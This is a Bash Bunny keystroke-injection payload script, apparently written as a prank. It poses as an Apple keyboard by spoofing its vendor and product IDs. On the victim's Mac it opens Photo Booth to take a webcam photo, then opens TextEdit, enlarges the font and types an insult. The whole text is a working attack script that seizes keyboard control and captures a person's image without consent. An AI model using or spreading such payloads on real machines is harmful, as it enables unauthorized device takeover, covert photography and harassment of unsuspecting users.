ATTACKMODE HID VID_0X05AC PID_0X021E

LED R 200

Q DELAY 1000
Q GUI SPACE
Q DELAY 100
Q STRING photo booth
Q DELAY 300
Q ENTER
Q DELAY 3500
Q ENTER
Q DELAY 500
Q GUI 1
Q DELAY 5000
Q GUI SPACE
Q DELAY 100
Q STRING textEdit
Q DELAY 100
Q ENTER
Q DELAY 1000
Q GUI N
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI +
Q GUI B
Q STRING saaaayyyy You look ugly!
Q DELAY 100
Q ENTER

LED G
